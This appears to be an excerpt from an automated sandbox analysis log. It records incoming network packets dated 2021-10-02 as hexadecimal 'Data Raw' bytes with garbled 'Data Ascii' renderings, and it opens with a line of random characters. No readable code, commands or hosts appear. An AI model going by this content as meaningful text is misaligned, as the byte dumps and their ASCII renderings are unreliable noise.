Rble2wfk#\|q3$-Uxn+Q)faShrCeGqT8Fmqm4J}38#89FwxyIk\@:<"L^fza3S)Od0<=+$Q-2RU,3#<IgzW}kK/Y99SpW{AOh(^P&Js!ffs
2021-10-02 16:13:23 UTC	92	IN	Data Raw: 01 f1 da ff 00 1f 8e 24 92 43 12 48 dc 6a 22 e7 4e f1 e2 22 35 28 83 b1 23 6e e2 47 8e 07 23 22 62 60 52 77 f5 89 3d 6c 49 27 a9 fa 62 d5 b2 a5 8a 57 08 72 da 96 78 5e c8 ff 00 68 3d d1 28 bd cf 86 d6 fe 71 8e 9a 06 3c 7d 61 68 56 35 f7 a1 87 bf 41 e3 d3 0d 0e c3 70 f0 85 82 2a 59 a9 1a 53 d2 19 44 80 48 eb 82 19 25 2c c4 25 f8 8f 7f bf f7 0e b5 78 1f fd b8 b1 0a 48 fa 82 4f 31 ef 16 62 0c d8 a9 b9 e9 0d 8a e3 1e 09 07 49 37 3b 1b 91 d4 f8 60 89 73 bc f8 c3 1e a7 da 70 44 3b e7 0d df 6e f1 f7 fc 60 89 0a 09 77 6a e4 ed 0b 7f 14 db c0 26 c7 e3 82 21 b1 65 ae ef 1a 34 35 Data Ascii: $CHj"N"5(#nG#"b`Rw=lI'bWrx^h=(q<}ahV5Ap*YSDH%,%xHO1bI7;`spD;n`wj&!e45
2021-10-02 16:13:23 UTC	92	IN	Data Raw: c5 ed 7c 30 49 21 f4 a9 f0 ce 2c 09 64 97 cd 8f 16 68 05 92 2d 63 6e bf c6 15 9f 38 94 65 df ec 22 3c 11 58 04 9d e6 16 08 b8 06 00 3e 5e f0 2a 17 1b 75 ee 3d ff 00 1c 30 20 66 1e 28 80 d6 7c be 7f 5c 4e 21 fe d1 e5 f6 82 00 ef be 15 8e 70 3b 65 0a f6 db 7d fd b6 fa 61 81 48 49 70 1c 03 5f 87 31 12 0d 41 ce a3 9c 78 b7 69 6c a8 bc f1 d9 cb 8e 99 5d 0d 46 79 ca 87 09 f3 cc 98 cd cc 2b 11 bf 30 a2 50 e6 57 a9 6e 2c b7 fd 44 2d 8a 8d 32 33 f1 dd 45 8b 52 1b 69 64 80 2c 66 c8 4f ee 64 17 af 66 ba e7 13 34 34 99 e4 80 f5 cf 91 67 f2 fc 47 c3 5e 76 8e f3 00 7a 43 e1 f6 d7 cc 2d 39 52 0a 87 20 05 38 db 92 63 b4 fc 30 e0 53 85 08 53 ca 69 d2 92 d9 47 33 43 80 ab 57 a0 82 f2 c1 39 94 8f 48 e7 63 ce a7 3a e1 2d b9 29 f9 0e 30 ca 5e 65 2b a9 c3 6a a5 4f 8a 1d 17 70 Data Ascii: \|0I!,dh-cn8e"<X>^*u=0 f(\|\N!p;e}aHIp_1Axil]Fy+0PWn,D-23ERid,fOdf44gG^vzC-9R 8c0SSiG3CW9Hc:-)0^e+jOp
2021-10-02 16:13:23 UTC	93	IN	Data Raw: 4c 48 94 fd 46 a4 b7 d2 79 31 1a 75 6a 57 aa 4a 76 56 89 89 bb ae e9 b3 92 8c 26 54 b1 22 54 b0 00 06 63 0e da 40 60 14 fb 83 ee d4 c7 a8 5f 17 8d 87 61 f6 2a d7 79 92 24 d9 b6 62 e7 99 26 c8 65 00 84 63 93 66 4c 99 36 7c 20 b2 8a a6 21 21 09 72 5d 54 3a c6 71 db 2b 89 90 78 85 c6 ba 85 2b 2c 36 51 90 f8 4f 47 a4 f0 93 21 36 a4 45 6d e3 94 f2 0f a4 d2 9d 5b aa 84 55 0e aa eb f5 79 b5 3d 15 44 29 85 4b a5 18 8d 34 d2 5f 6d 6a c6 1d d7 21 49 b3 09 93 52 3a db 47 f9 16 48 18 95 8b 2c 47 58 e5 ba 1b d9 d5 5c bb 1d 67 b5 5a 8a bf d5 76 8a d3 3b 68 6f 65 cc c5 8d 56 ab c8 a6 7c b4 92 a0 14 53 2a ce 64 a5 29 24 e1 5e 32 0d 43 6a 75 5a b6 9a 44 54 31 1d 60 55 e6 37 fd 55 34 e9 26 13 0a 4f 2d 2e b3 a6 d6 e7 c7 25 0c c7 58 01 90 96 d2 9b b6 db 44 ec 94 3a bf f2 96 Data Ascii: LHFy1ujWJvV&T"Tc@`_ay$b&ecfL6\| !!r]T:q+x+,6QOG!6Em[Uy=D)K4_mj!IR:GH,GX\gZv;hoeV\|Sd)$^2CjuZDT1`U7U4&O-.%XD:
2021-10-02 16:13:23 UTC	95	IN	Data Raw: 1d c0 e5 df 08 10 7c 8f 81 eb f0 c1 0e 55 89 67 73 53 ca 05 45 57 db f6 be 08 8c 09 dd e6 62 2c 11 00 4b af 2d e7 d7 28 62 40 ea 40 f6 9f ae 2c ec e0 2d c3 d7 58 ac d4 d0 72 88 b5 dd d0 35 7a b7 ff 00 69 ea 34 83 fb dc 7c b1 8c b2 b1 40 73 ca 83 7b 37 87 3e 50 54 1d c4 47 8c 76 9f 66 64 ae cb fd a6 63 53 1d 5c 7a 93 9d 9d 78 dc 29 ef a5 a9 0f ad a9 bf f7 69 99 bd 19 4c b3 11 89 52 de 90 5d d2 86 5b 8e c3 ce a9 4b b0 6e c4 ad bb e4 92 89 f6 55 8a 27 10 0b 7d cf a6 e6 f9 c2 9b 5a e6 09 2a 52 48 08 20 f5 84 87 ab 68 73 19 71 15 ae 4d 1f 0f 59 9a 73 35 d8 14 ea ec 5d 4f b1 98 68 d4 aa e3 49 8e 23 a6 19 76 64 28 6d 4b 8e 9a 6c a6 d6 db c9 66 a3 ce 6e 43 71 c9 71 a7 1b 5b 2e 29 08 d2 8c 77 e9 51 29 0d 91 48 6e 44 53 8f de 34 89 ed 07 4f d2 db f4 f7 8f 22 97 21 Data Ascii: \|UgsSEWb,K-(b@@,-Xr5zi4\|@s{7>PTGvfdcS\zx)iLR][KnU'}Z*RH hsqMYs5]OhI#vd(mKlfnCqq[.)wQ)HnDS4O"!
2021-10-02 16:13:23 UTC	96	IN	Data Raw: 6c ce ca 8b 34 e4 5c 53 ad a8 be b6 9a 72 c0 16 65 5d d7 7a 82 e5 59 3a d7 ff 00 af 6a b4 4d 41 60 f8 93 25 58 99 e9 e6 fc 2a ec fb c7 9e 31 c8 0d 64 3c 8b 56 10 5d 70 b9 2f 33 e6 34 b5 41 ca 91 9b 4a 1b 02 5a eb 35 81 06 2a bd 1d 96 fd 29 e6 a2 b9 50 96 42 5e 71 b8 ee 29 0b 25 2d f7 e5 db 76 80 2d 33 52 82 94 27 ab 4c be d9 5b 50 21 29 4e 20 03 82 2a c7 76 91 d0 ed 0e de ec 5e ca d9 e5 a6 df 7d ca 93 39 09 69 16 09 29 4c fb 54 c4 02 a4 ca 92 24 59 f1 cc c5 85 29 01 c6 a0 46 de 52 b8 37 d9 db b3 5b cc 48 ac e6 ba 1f 69 ae d3 6b 70 a6 93 90 69 b0 1e 9b c1 ec 8b 53 73 4a d3 58 ce 52 9d 7a 33 f9 86 75 21 61 0b 63 2f cb 4c 66 5f 92 d2 da a9 d2 59 84 8f 4a 57 3b 36 f3 bd 6f 74 99 c2 c6 ab 05 d3 2c 29 4b 9e b2 3a d9 88 63 50 1c 29 22 84 be 4c 07 00 79 db 88 6d Data Ascii: l4\Sre]zY:jMA`%X1d<V]p/34AJZ5)PB^q)%-v-3R'L[P!)N *v^}9i)LT$Y)FR7[HikpiSsJXRz3u!ac/Lf_YJW;6ot,)K:cP)"Lym
2021-10-02 16:13:23 UTC	97	IN	Data Raw: 10 13 91 0f 9b 57 91 f5 a4 7c 7d f6 81 ca 71 78 15 c5 8c cd c1 e2 e8 97 94 2a b1 e9 fc 51 e0 5e 64 58 6a 42 33 3f 06 f8 c3 49 87 c4 6c 94 d3 0e 91 e8 ae bd 4b 89 5c 72 95 50 43 2f 25 c8 95 78 b3 a0 b6 eb ca a7 59 3d 45 d9 6a 4d a6 43 23 fe ad 9d 46 5c e4 3f d2 94 10 9c 6e da e6 cc 33 a4 71 db 3b 7b 4b bc ae d4 a9 21 a7 49 9d 36 c5 3d 0b ff 00 e5 da 2c eb 32 8e 36 c4 ac 2b 09 c5 93 b2 85 35 8d 59 a9 cc 48 2e 25 6f 21 2b 43 80 24 38 a8 92 cb 41 b0 b5 15 26 3c d0 26 82 ad 57 45 93 cb 6c 27 4a 9b 57 28 20 ee 0e 41 41 98 b9 01 fc 1b 7b ef 8d ba 56 92 e0 2d d4 16 a4 f6 43 a4 90 a6 a1 2c 48 3b d8 36 44 c5 9d 35 38 d1 9a 2a 44 b4 07 1a 0f 25 d4 35 24 45 74 a4 b2 a6 98 5c 9a 6d 45 2d b2 f2 14 12 bb a5 85 2c 3c 12 12 85 0d 1b e3 a9 60 b3 b0 f9 f8 89 c0 b5 66 1c 0c Data Ascii: W\|}qxQ^dXjB3?IlK\rPC/%xY=EjMC#F\?n3q;{K!I6=,26+5YH.%o!+C$8A&<&WEl'JW( AA{V-C,H;6D58D%5$Et\mE-,<`f
2021-10-02 16:13:23 UTC	98	IN	Data Raw: 63 bf c6 94 11 ce dd 57 ce dc 4e 9d 6b ff 00 85 f6 16 55 c7 fb db 44 db 6d a6 d9 6d 22 64 db 44 e9 c0 03 32 62 96 4b a9 b2 3a 7f b6 3c 76 af da c7 b1 1f 08 1c 75 ae cf 7d 98 e3 66 4a 9c 15 28 53 b3 67 11 f9 93 41 7b d1 e2 b4 89 8d 22 b7 2b 32 55 13 6b ad ed 11 13 41 7e 2d 46 3a 26 46 98 18 90 a6 15 6a 36 7b 68 ad ff 00 e4 bc ef 49 a1 0b 20 aa 5d 9c e1 00 17 ec a4 82 3b 2c de 24 0d c3 68 9d 81 e9 13 68 c2 66 6d 1e d8 7f a6 4b 9a 01 b4 58 ee f9 95 2c a5 83 2c 04 84 26 5b a4 d5 96 b0 28 41 70 00 d5 5e 31 76 ef ed 0f c6 75 4b a7 54 33 6f fa 53 2d ca 1c a5 65 bc 8c ca 72 ec 1f 47 5a 0b 6f 44 72 7c 5f ff 00 5c 95 09 fd 52 1d 72 04 aa ab d4 f4 bb 32 67 22 23 2d 48 75 a5 6f ac 9b 3b 76 58 c2 15 d4 aa d7 85 4f 8a d8 b3 34 89 81 81 23 1e 40 96 64 e8 41 66 78 ee 36 Data Ascii: cWNkUDmm"dD2bK:<vu}fJ(SgA{"+2UkA~-F:&Fj6{hI ];,$hhfmKX,,&[(Ap^1vuKT3oS-erGZoDr\|_\Rr2g"#-Huo;vXO4#@dAfx6
2021-10-02 16:13:23 UTC	100	IN	Data Raw: a5 41 23 49 00 7c ba 78 ec 7a 9f 7e 08 ae 01 fd 3a af ff 00 cc 3d 47 80 ff 00 38 20 88 35 58 75 36 f7 e2 80 4f 58 9e 2e fe 06 9c 21 92 09 50 03 3d 1e 12 54 0a 85 8f 42 0f 86 2f 8b 01 66 04 d4 ea 3d 74 f2 dd be 38 d5 f8 f3 67 19 39 7b b0 8c 4a 14 4a a0 84 bc fd c6 cc 87 44 a8 42 44 f1 12 55 4e 93 42 a5 e6 5c cf 26 3b 11 88 0d d5 19 6e a3 4a a6 ca 76 23 af b2 da 5d 62 13 e7 9b cb e4 af 63 77 20 aa 71 ff 00 60 cd d9 dc 6e d1 ea 2a c7 85 44 60 5e 24 a5 2f 9a 8f d4 1e 84 3f 9d 46 e7 df c3 8f fc 02 c9 19 7b f1 2c ec 9b c3 8e 07 47 6d ba 8f 6c 0e c4 c8 af 49 c8 39 4d f9 cd 65 c9 fd a3 fb 31 4d ad ca cc 73 f8 6d 48 cd 0e 37 28 53 f3 9f 0f 2a b5 4a 83 39 72 47 2a 64 56 69 35 78 91 9b 86 fa 65 ce 9d 17 12 d9 36 6d c1 6c 5d ad 14 b1 db 7b 33 d4 e7 fc 45 46 8a 58 00 Data Ascii: A#I\|xz~:=G8 5Xu6OX.!P=TB/f=t8g9{JJDBDUNB\&;nJv#]bcw q`nD`^$/?F{,GmlI9Me1MsmH7(SJ9rG*dVi5xe6ml]{3EFX
2021-10-02 16:13:23 UTC	101	IN	Data Raw: c3 76 b0 ac a9 52 29 10 f8 5f 94 b4 a5 51 75 52 f2 d4 fa 8d 51 51 5e 22 5c 98 8a 99 9c 33 16 62 97 1e 90 6a b2 3d 2d 8a 6b 12 11 1a 04 88 b0 a1 42 66 24 28 8d 35 8d 82 36 3a ea 03 14 d9 6a 52 9d be a7 70 69 53 9d 73 61 de e2 36 b6 4e 84 36 2e c9 37 ac 9a 2d d6 b4 91 2d 3f e5 9e 12 53 81 cd 19 07 ea c8 be 79 c6 b8 67 0f c4 3f b6 2e 6f fc 9d 33 b8 e7 9a a9 31 e8 9e 8c 9a 4d 3b 29 0a 5e 4c 62 9f 25 86 da 65 52 a3 40 cb 74 ca 62 51 35 e6 63 32 cc a9 6a 70 bd 39 0c b0 24 3a eb 2d a1 38 cf b3 6c f5 cd 64 1f e2 b0 cb 59 7f a9 65 c8 e2 cc 43 70 2f e6 63 ab b0 f4 69 b1 16 29 53 02 76 76 c7 39 46 66 34 4c b4 95 4e 6a e6 a0 a2 02 9a ac 3f 04 6a 8e 6a e2 1e 7a ce d3 9e 9b 9c 73 96 69 cd b3 14 94 21 72 f3 15 7e a7 5a 74 36 ca 8b 88 41 5d 55 d7 d4 50 cb ae 3c 50 6c 1b Data Ascii: vR)_QuRQQ^"\3bj=-kBf$(56:jRpiSsa6N6.7--?Syg?.o31M;)^Lb%eR@tbQ5c2jp9$:-8ldYeCp/ci)Svv9Ff4LNj?jjzsi!r~Zt6A]UP<Pl
2021-10-02 16:13:23 UTC	102	IN	Data Raw: 4f 0f bb db 17 cd ea da 8a 49 2d 90 df 93 70 6f ee 1d 86 e1 e1 08 92 49 27 a9 c6 34 47 65 2f 90 3e 7f 3f b8 6c 11 5e 35 1f c7 cf cc 12 6d 7d fa 5b c6 d8 64 96 20 9f 94 88 62 03 90 c3 28 63 6b 9b 74 c4 2e aa 04 6f ff 00 f8 4c 48 4a 8e 40 98 5a 8a 47 5b 0c 00 90 1b 43 10 41 19 82 39 c4 4a 1a c0 d2 7a 5f ef a1 c4 43 a0 ab f9 02 3d 3c 73 e5 0e 08 36 41 b9 ee 3e ef f1 82 10 e6 79 9f 58 49 36 d5 e0 3e 43 7c 10 00 e4 08 80 10 49 b7 80 fe 70 45 fd 5a 70 bf cd d9 fb 6f 82 c1 14 10 c4 88 58 22 21 60 86 18 85 40 3e 14 30 ac 30 c5 45 59 fc f7 81 0b 39 2a 99 e7 bf 37 7d 5e 16 16 1d 61 2c e0 82 78 7c af ca b4 35 c7 88 c1 0a 02 70 d4 b1 7a 6f 66 15 81 48 b2 95 7d 93 bf ff 00 eb bf df 9e 08 48 8c 92 7a e1 82 88 fc c0 cf 43 ae fa 40 28 5c 1f 2b 9f 96 14 97 a9 83 e9 76 d1 Data Ascii: OI-poI'4Ge/>?l^5m}[d b(ckt.oLHJ@ZG[CA9Jz_C=<s6A>yXI6>C\|IpEZpoX"!`@>00EY9*7}^a,x\|5pzofH}HzC@(\+v
2021-10-02 16:13:23 UTC	103	IN	Data Raw: c2 ea f5 0f 55 21 4b 50 3a 10 f0 e6 92 10 4e ad 6a 52 49 1a d3 b1 07 06 63 10 c9 d9 f8 c5 8a a2 54 ce 30 9c 26 86 84 e8 5c 6e ac 50 59 2a 52 d5 ea 80 5c 56 94 15 0b 85 5b a8 d5 7d 29 36 be a5 1b 5e fd f7 c1 0a 8c 3a 91 c1 df ec d0 c1 49 4d f4 e9 04 36 75 a4 d9 37 37 09 3c b0 a0 b0 a5 1d 43 a1 d7 b2 94 9b 0b 58 84 88 d4 08 29 04 1d 23 49 27 d6 d8 aa fd ff 00 a8 12 01 37 d8 79 74 38 20 81 29 3a 35 02 3a 9b ea 2b df 7b ee 34 a9 27 6d 3d 4f b7 a0 c1 07 cf 48 fa d3 ff 00 b3 8b 97 98 ce dc 19 ed 93 95 ab d2 43 d9 77 30 56 f8 61 97 8c 2f 47 8d aa 3c a5 51 73 dc a4 55 d1 2f 91 e9 8b 71 8d 31 1b 8d 19 52 55 0d b7 11 e9 09 8c 5f bb b8 e5 76 ae c1 2a f2 ba ad 16 15 cb a4 e4 af b6 df 4a 92 1d 3c b1 1c 9a 3d 63 a2 3d b1 b7 ec 2e dc 6c ee d3 58 67 cc 97 68 ba 6d d2 67 Data Ascii: U!KP:NjRIcT0&\nPYR\V[})6^:IM6u77<CX)#I'7yt8 ):5:+{4'm=OHCw0Va/G<QsU/q1RU_vJ<=c=.lXghmg
2021-10-02 16:13:23 UTC	105	IN	Data Raw: f6 22 38 ea d7 50 e3 75 65 db c9 08 49 48 8d c3 7a 5c 60 a6 5c 65 d6 54 a5 3c 8b 21 cd 7c f7 34 96 79 28 6d 6a 71 1b ab be d1 2e 4b 15 14 e8 08 a6 bd fa eb 5e 4c d1 85 6d b2 da 67 09 62 5c bf e4 3f 89 61 b8 16 cb 53 bc 18 f9 87 7a 85 35 a7 25 25 e8 53 59 74 a9 ad 2e aa 9c c1 e5 25 6f 85 34 97 9f a6 ac 32 6e 02 11 ad 6c 3c b7 75 20 41 a7 a4 11 23 1b 33 39 2a 25 41 99 44 91 5d f5 f9 be 34 ea b2 ce 49 50 52 0b 82 5e 85 9d ea 1f 87 e2 2b 39 d3 e9 8e 37 3a 3c 89 94 ba a4 59 0c be 5f 8e f5 5e 1d 4e 11 69 f4 4b 6a 72 5e 79 6e 3f 19 4d be 5b 53 13 66 cd 12 db 78 34 f4 38 91 dc e6 6a 02 f1 05 25 7d 5c f4 2c 11 d4 10 14 a4 83 43 5e 2f 4d 58 f3 6a 17 2f 17 65 65 05 20 34 c9 53 51 88 4e 0a 71 81 88 3b db 42 5e 8d 1d 95 ec fb f8 ca e7 78 79 6d 7c 1d ed ab 91 e2 76 a0 Data Ascii: "8PueIHz\`\eT<!\|4y(mjq.K^Lmgb\?aSz5%%SYt.%o42nl<u A#39*%AD]4IPR^+97:<Y_^NiKjr^yn?M[Sfx48j%}\,C^/MXj/ee 4SQNq;B^xym\|v
2021-10-02 16:13:23 UTC	106	IN	Data Raw: d4 86 dc 71 bb fa 3a 93 63 eb 4b 47 a8 d3 ba 9b da 92 e5 13 f4 85 f6 c7 06 f9 4e 71 b9 ba 17 fe 59 80 a8 a4 84 76 08 3a 92 cc ee 0f 9d 79 c7 59 fb 6a 65 b6 a8 bc 64 4d 5a 2b 21 b8 d9 bb 2d d2 ab ca 29 4d 92 a9 9c b5 d3 66 9d 49 25 0a 71 4f d3 d4 e2 ed 7f fc 40 49 b9 38 f9 67 a4 3b 22 2c db 41 39 72 43 22 72 42 97 c4 e7 e4 78 b6 e1 1f bc bf a2 dd a8 9d b4 9d 0f d9 24 4f 9c a9 8a b8 2d 1f e9 52 d2 a2 f8 50 90 55 4d c3 b3 df 9c 6a 46 38 38 fa ec 66 39 8f 58 58 22 d4 24 21 78 c6 7a 7c fc 45 c6 91 57 a8 d0 6a 94 fa cd 22 5c 88 15 3a 64 b6 26 41 99 15 c2 d4 88 d2 58 71 2e 32 e3 2e 26 c5 2b 0e 25 20 7a c9 0a be 92 6c 48 37 c8 b5 5a ac d3 e5 cf b1 ac a2 74 a2 16 a5 02 47 64 10 48 a3 69 e3 94 6a 6f 9b a6 ea da 0b 15 be ea bf 6c 68 b5 d8 2d 96 59 d6 69 d2 96 80 a4 Data Ascii: q:cKGNqYv:yYjedMZ+!-)MfI%qO@I8g;",A9rC"rBx$O-RPUMjF88f9XX"$!xz\|EWj"\:d&AXq.2.&+% zlH7ZtGdHijolh-Yi
2021-10-02 16:13:23 UTC	107	IN	Data Raw: 94 e1 ac ea 5a 52 05 4b 0d d4 8e 3a 3d 43 cb 72 de b4 bc a7 45 00 a8 6a 2d 45 e5 39 a8 9d 5a 50 b6 54 97 52 e2 d5 d4 a5 28 75 42 e9 53 a9 49 23 1a 05 74 8b 7f 48 29 4c db 35 9b b0 18 95 a7 0a e9 47 58 a3 28 ea 0e 46 3d c2 67 e8 bf a1 fb d1 ed 37 58 bd 2c d2 96 f8 66 f5 fd 6a 0a 54 1c 14 95 b2 48 23 57 ab e7 a4 50 ab 2c e4 40 a6 c1 ca 8c b2 84 3e a7 d0 cc 79 55 06 12 cb a7 52 90 63 a5 a9 05 0d ad a5 b8 ea 43 dc b3 24 f3 16 43 ad ac ea c6 5c be 94 ef 24 87 fd 9c 95 10 33 41 64 fd de ac da 70 66 3c ad bf f4 0b d1 dc d7 12 76 8a d9 25 64 95 04 f5 72 66 29 2e 1e a0 54 e7 98 3c b3 78 a1 77 22 64 27 2e da b2 d3 e9 25 f5 49 41 33 24 0d 12 56 3d 67 03 4e 29 d6 f9 eb 5f f5 14 fb c8 79 f0 ed dd ba 35 10 72 7f f6 b7 6d 05 95 77 20 e6 40 eb 56 8e 3f c7 c7 2f c6 8e 77 Data Ascii: ZRK:=CrEj-E9ZPTR(uBSI#tH)L5GX(F=g7X,fjTH#WP,@>yURcC$C\$3Adpf<v%drf).T<xw"d'.%IA3$V=gN)_y5rmw @V?/w
2021-10-02 16:13:23 UTC	109	IN	Data Raw: 33 17 14 b2 9d 23 31 e5 89 f1 92 1c a6 b6 78 7b 22 7c aa bc 1a 88 e7 0f 46 72 4c 2a c7 3a 14 91 1d 69 53 b1 5c 8e eb ad a5 d4 6a d6 de 8e 6c e5 23 57 e3 90 78 ce b0 2b fc c2 50 9a 99 78 d8 e0 76 33 30 d4 25 35 ab 33 b0 f4 8e f0 f6 f0 9e cf fd e0 64 aa 6b 6a 06 45 3b 23 47 5c a4 7f bd b3 36 a5 39 e6 50 e2 6f 64 15 b2 52 e8 ef 52 14 93 d0 e3 e6 3e 93 2d 12 a6 df 68 40 aa a5 59 25 8f 12 de 45 eb dd cf f7 03 f4 0b 77 5a 65 74 57 7c 5a e7 c8 54 99 76 fd a0 5c cb 19 5a 54 9e b2 ca 89 4a 02 62 5c 07 18 da a0 37 3c e3 47 91 7d 37 3d e4 f4 f6 e3 cc 90 8c 0a 24 97 70 7c c7 21 1f 75 7d 04 3d 18 8a 77 fc 30 58 78 8f e7 8f bf 5c ff 00 aa 42 c1 17 85 05 73 d7 5e 7f 9e 71 e9 7c 23 e2 65 67 84 b9 e2 93 9c 28 eb 52 91 1d d4 b1 58 a7 95 90 c5 5a 8e f1 29 9d 05 e1 74 a4 15 Data Ascii: 3#1x{"\|FrL*:iS\jl#Wx+Pxv30%53dkjE;#G\69PodRR>-h@Y%EwZetW\|ZTv\ZTJb\7<G}7=$p\|!u}=w0Xx\Bs^q\|#eg(RXZ)t
2021-10-02 16:13:23 UTC	110	IN	Data Raw: be a8 73 10 87 42 10 95 95 39 a2 2c 34 94 af 40 90 f6 a5 ab 8a da 1d 82 b1 5e 89 99 32 cd 2e 5c 89 8e 54 b2 84 b6 22 49 2a 24 be 64 d7 ee 29 1f 5d f4 33 fa c0 db 4d 89 9f 67 b0 de 76 a5 df d7 3e 24 4b 58 b6 cc 2a 9b 26 50 60 12 82 b0 3e 90 02 41 0f 41 ad 08 f7 98 fc 89 ec a2 6d 32 52 26 c2 5a 10 b4 3a c2 5e 2a 08 50 4f eb 42 2c bb 24 92 52 b0 50 d2 ff 00 db 70 41 3e 1f 7e ec a5 b2 e0 99 8a 7c a5 2e c6 7e 99 89 4b 93 bd e8 d4 34 19 66 fc ff 00 56 7a 30 e9 f7 61 ba 50 91 29 37 45 e1 2a 45 ec a9 49 33 2e cb 54 d1 2a 7c b5 e4 70 a8 86 9a 16 a7 29 09 51 20 10 38 43 21 2a 1e b2 54 54 80 14 80 b4 87 c0 51 50 00 d8 25 24 6b 23 55 f4 e8 24 05 25 4b b2 41 c7 26 a4 ff 00 90 99 65 58 71 38 07 30 e0 d3 4a 70 2e 32 66 72 fe da cf 84 9a 2c 03 88 76 9a a6 8c ec ee 33 23 Data Ascii: sB9,4@^2.\T"I$d)]3Mgv>$KX&P`>AAm2R&Z:^POB,$RPpA>~\|.~K4fVz0aP)7EEI3.T\|p)Q 8C!TTQP%$k#U$%KA&eXq80Jp.2fr,v3#
2021-10-02 16:13:23 UTC	153	IN	Data Raw: 4b b5 72 a1 f4 8c 0f fd aa f4 d7 7b 4c 36 5b 8f a3 09 62 d7 84 14 8b 51 b4 4a 96 c4 91 88 cc 29 ea f3 7e c9 53 f2 78 eb df e1 6f 55 ec 7b c0 1e 30 d7 d5 c3 ac bd 39 71 1a e1 96 66 91 52 e2 5d 69 9a 83 d5 6c c5 26 9e aa 3a e2 e5 fa 17 e6 82 24 d7 55 54 7d 6f 29 c4 45 a5 d3 a9 e6 3b 25 c7 12 e2 da 4a 86 ae dd b4 17 8d 82 54 fb c2 f5 9d 28 49 4a 09 93 66 42 92 49 5b 76 92 a4 f2 1a 33 65 1f 55 7e 98 7f 4f df a8 ce 95 76 de cf 79 ed 5d 9a cf 22 c7 68 96 89 76 4b 9a cc 92 2c d7 78 99 33 0d a6 d5 36 68 4a 42 cc b9 41 e5 92 55 5e 51 b0 5c 50 cf f5 4e 29 67 8a fe 76 ab a4 30 ed 5a 5e a8 74 f4 90 5a a6 d3 58 49 62 9f 4e 69 49 03 52 21 c4 43 2d 05 2a e5 c2 95 b8 a3 ad 44 63 e7 1b de f3 5d f1 79 5a 6f 05 92 7a d2 53 2c 1f e0 80 5c 24 7f db ba 91 fd 3e 74 5d b0 d6 1e Data Ascii: Kr{L6[bQJ)~SxoU{09qfR]il&:$UT}o)E;%JT(IJfBI[v3eU~Ovy]"hvK,x36hJBAU^Q\PN)gv0Z^tZXIbNiIR!C-*Dc]yZozS,\$>t]
2021-10-02 16:13:23 UTC	154	IN	Data Raw: 1c 04 90 5c 97 62 cc d9 b5 23 e4 e7 fe d0 a3 8e 9e d1 9c 08 61 e9 2c a2 1a b8 18 b4 b2 58 61 c8 b3 01 5e 7d ae 99 a6 54 d7 19 54 19 cd 6c 80 d4 60 f2 4c 26 c9 4c 95 72 9e 6d 2a df 5d 00 2d 33 49 3d b6 21 86 43 df 8b 9e 0d bc e9 ef 34 94 89 29 24 64 14 a1 99 c2 2a 5b cf 80 dd 1f 3e 84 2a 2a c0 08 4b 69 75 08 71 b5 2e 23 45 cd 0e a8 25 b7 04 98 ae 94 25 d4 34 a2 02 de 69 4e 8b 84 b4 c0 40 40 4e c5 49 05 9c 31 1b bd fe 08 d7 90 a5 04 99 73 14 94 fd 49 62 d4 d2 a3 c3 37 6d f5 8f 5c c8 fc 59 cc 59 52 7a dc 65 d5 b5 0c 4b 0c c8 69 62 a8 fc 77 6c 14 2c fa 5f 53 89 fe b2 56 56 a7 a5 2e 4c a5 9d 05 88 a1 2d fa fa db 6d d9 67 b7 a5 52 e7 c8 97 39 18 4b 21 69 05 20 91 52 09 d5 eb cd 86 e8 eb b6 5b 6d b6 8b 64 ed d2 ad d7 6d e9 6a b1 cd 90 a4 ae 42 ec f3 0a 26 4b 50 Data Ascii: \b#a,Xa^}TTl`L&Lrm]-3I=!C4)$d[>**Kiuq.#E%%4iN@@NI1sIb7m\YYRzeKibwl,_SVV.L-mgR9K!i R[mdmjB&KP
2021-10-02 16:13:23 UTC	156	IN	Data Raw: 12 84 b6 39 f6 5f 26 e2 f4 ee 8f ab f6 5b 63 36 6f 63 2c f2 2c bb 37 73 d8 ee d9 52 d2 a9 49 99 22 4a 13 34 a0 86 50 52 d8 a8 be 75 3c 4c 74 72 f7 df 6d fc 00 48 f7 00 00 03 c8 00 06 34 e9 fe 74 01 d4 72 02 8c 5e 9b b3 8e c4 32 12 84 1c 92 49 48 d1 25 59 91 cf 2e 3a 43 8e a3 da 30 d0 4c 03 31 c3 d3 e3 70 89 ae 0f 42 30 45 70 f8 21 58 02 4b e7 bf 2a 98 65 74 00 77 ec 7c ba ff 00 18 9c 54 6a 37 9c 3a 26 a5 2e cc 77 bb f9 53 8f 1a 3c 66 bc 35 cd b2 b8 7f 9f b2 8e 71 88 ea d0 aa 0d 7a 9f 36 42 10 e1 40 91 05 12 1b 4c e8 ab 22 e1 4d ca 88 b7 d8 71 2a 1a 54 85 a8 2a f7 18 ce ba ed 2b b0 de 16 6b 62 58 75 33 a4 d4 e5 da 99 da 7e 49 af 74 71 1d 26 6c e5 8f 6c b6 07 69 ee 0b 5c ae be 5d b2 eb b5 a1 08 a6 24 4d ea 17 d5 ae 51 29 38 56 15 92 80 71 9b ee ee 86 60 69 Data Ascii: 9_&[c6oc,,7sRI"J4PRu<LtrmH4tr^2IH%Y.:C0L1pB0Ep!XKetw\|Tj7:&.wS<f5qz6B@L"MqT*+kbXu3~Itq&lli\]$MQ)8Vq`i
2021-10-02 16:13:23 UTC	157	IN	Data Raw: 2d ac 82 8a e6 cb 13 92 d3 1c b5 43 50 50 82 c4 55 ea 23 2a cf 6a 9d 66 b4 7e e6 4c c5 cb 58 0c 90 82 c9 67 fe 42 a1 47 3a b0 dd ac 6e 3f 0e 78 fc 84 fa 1d 0f 38 21 c7 a3 48 d6 3d 3a 44 76 e2 c9 8f 65 a4 07 16 a9 12 25 29 a5 03 eb ad 13 9d 0e be d3 d1 d4 c3 49 4a 16 a5 f0 7b 4f b1 f7 7d fd 2c cc 9b 24 0b 5a 07 f8 e6 4b 18 46 10 96 6c 20 56 a4 6b a7 18 fa 8f a1 9f d4 b6 d7 f4 61 6e b3 fe de f0 5c cb b5 6a 12 ed 17 74 d5 a9 76 79 88 33 12 a5 19 52 d4 a2 13 39 90 42 54 09 60 54 30 d5 c6 cf a5 51 e5 35 f9 85 3e 5a 2a 10 1d 42 14 25 45 91 cf 48 6c 84 d9 05 c6 12 4d 9c b1 e5 38 e0 6d b2 92 95 14 5b d5 3f 3b df 5b 31 78 dc b3 27 f5 d2 56 ab 30 7f f2 61 3d 84 bd 15 52 5f 88 cf 73 3c 7e ce f4 55 d3 9e ca 74 b3 76 59 6d 17 4d e3 66 93 7a 99 68 16 eb b5 53 13 d7 a1 Data Ascii: 